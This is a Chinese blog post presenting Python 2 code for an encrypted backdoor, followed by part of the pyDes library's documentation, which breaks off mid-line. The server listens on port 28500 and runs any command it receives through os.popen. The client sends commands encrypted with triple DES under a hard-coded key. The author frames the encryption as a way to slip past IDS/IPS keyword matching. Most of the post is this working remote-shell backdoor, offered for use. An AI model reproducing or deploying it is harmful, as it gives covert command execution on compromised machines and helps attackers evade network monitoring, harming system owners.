python后门_python加密通讯后门

加密通讯内容过一些检测数据包匹配关键字的ips和ids还是可以的，简单的demo。

client.py

[php]

# client

import socket

import time

import binascii

import base64

import pyDes

import sys

#use des

iv = '2132435465768797'

key = 'aa000000000000000000000002200000000000aa0000000d'

#data = "afuckfucdfadf"

#des

def encrypt(iv, key, data):

iv = binascii.unhexlify(iv)

key = binascii.unhexlify(key)

k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)

d = k.encrypt(data)

d = base64.encodestring(d)

return d

def decrypt(iv, key, data):

iv = binascii.unhexlify(iv)

key = binascii.unhexlify(key)

k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)

data = base64.decodestring(data)

d = k.decrypt(data)

return d

if __name__ == '__main__':

print sys.argv[1]+sys.argv[2]

print 'client.py ip port'

address = (sys.argv[1], int(sys.argv[2]))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(address)

data =decrypt(iv,key,s.recv(512))

print data

while True:

commond=raw_input()

s.send(encrypt(iv,key,commond))

time.sleep(1)

if(commond=='q'):

exit()

data = decrypt(iv,key,s.recv(9999))

print data.rstrip('\n')

s.close()

server.py

# server

import socket

import subprocess

import os

import time

import binascii

import base64

import pyDes

##use des

iv = '2132435465768797'

key = 'aa000000000000000000000002200000000000aa0000000d'

#data = "aaaaaaaaaaaaaaaaaa"

##use des

def encrypt(iv, key, data):

iv = binascii.unhexlify(iv)

key = binascii.unhexlify(key)

k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)

d = k.encrypt(data)

d = base64.encodestring(d)

return d

def decrypt(iv, key, data):

iv = binascii.unhexlify(iv)

key = binascii.unhexlify(key)

k = pyDes.triple_des(key, pyDes.CBC, iv, pad=None, padmode=pyDes.PAD_PKCS5)

data = base64.decodestring(data)

d = k.decrypt(data)

return d

banner="by \r\n"

address = ('0.0.0.0', 28500)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s = socket.socket()

s.bind(address)

s.listen(5)

ss, addr = s.accept()

def cmd(data,pwds):

if "q" == data.lower():

s.close()

#break;

exit(1)

else:

if data.startswith('cd'):

print '2 pwd is'+pwds

str=pwds+data[3:].replace('\n','')

print 'str is '+str

os.chdir(str)

pwds=os.getcwd()

result=['',pwds]

else:

r=os.popen(data).read()

result=[r,pwds]

return result

def main():

pwds=os.getcwd()

ss.send(encrypt(iv,key,banner+'\r\npath is '+pwds))

while True:

ra =decrypt(iv,key,ss.recv(512))

[r,pwds]=cmd(ra,pwds)

ss.send(encrypt(iv,key,r+pwds))

ss.close()

s.close()

if __name__ == "__main__":

main()

用的是这个库http://twhiteman.netfirms.com/des.html

pyDes.py

#############################################################################

# Documentation #

#############################################################################

# Author: Todd Whiteman

# Date: 16th March, 2009

# Verion: 2.0.0

# License: Public Domain - free to do as you wish

# Homepage: http://twhiteman.netfirms.com/des.html

#

# This is a pure python implementation of the DES encryption algorithm.

# It's pure python to avoid portability issues, since most DES

# implementations are programmed in C (for performance reasons).

#

# Triple DES class is also implemented, utilising the DES base. Triple DES

# is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key.

#

# See the README.txt that should come with this python module for the

# implementation methods used.

#

# Thanks to:

# * David Broadwell for ideas, comments and suggestions.

# * Mario Wolff for pointing out and debugging some triple des CBC errors.

# * Santiago Palladino for providing the PKCS5 padding technique.

# * Shaya for correcting the PAD_PKCS5 triple des CBC errors.

#

"""A pure python implementation of the DES and TRIPLE DES encryption algorithms.

Class initialization

--------------------

pyDes.des(key, [mode], [IV], [pad], [padmode])

pyDes.triple_des(key, [mode], [IV], [pad], [padmode])

key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes

for Triple DES

mode -> Optional argument for encryption type, can be either

pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining)

IV -> Optional Initial Value bytes, must be supplied if using CBC mode.

Length must be 8 bytes.

pad -> Optional argument, set the pad character (PAD_NORMAL) to use during

all encrypt/decrpt operations done with this instance.

padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5)

to use during all encrypt/decrpt operations done with this instance.

I recommend to use PAD_PKCS5 padding, as then you never need to worry about any

padding issues, as the padding can be removed unambiguously upon decrypting

data that was encrypted using PAD_PKCS5 padmode.

Common methods

--------------

encrypt(data, [pad], [padmode])

decrypt(data, [pad], [padmode])

data -> Bytes to be encrypted/decrypted

pad -> Optional argument. Only when using padmode of PAD_NORMAL. For

encryption, adds this characters to the end of the data block when

data is not a multiple of 8 bytes. For decryption, will remove the

trailing characters that match this pad character from the last 8

bytes of the unencrypted data block.

padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL

or PAD_PKCS5). Defaults to PAD_NORMAL.

Example

-------

from pyDes import *

data = "Please encrypt my data"

k = des("DESCRYPT", CBC, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)

# For Python3, you'll need to use bytes, i.e.:

# data = b"Please encrypt my data"

# k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)

d = k.encrypt(data)

print "Encrypted: %r" % d

print "Decrypted: %r" % k.decrypt(d)

assert k.decrypt(d, padmode=PAD_PKCS5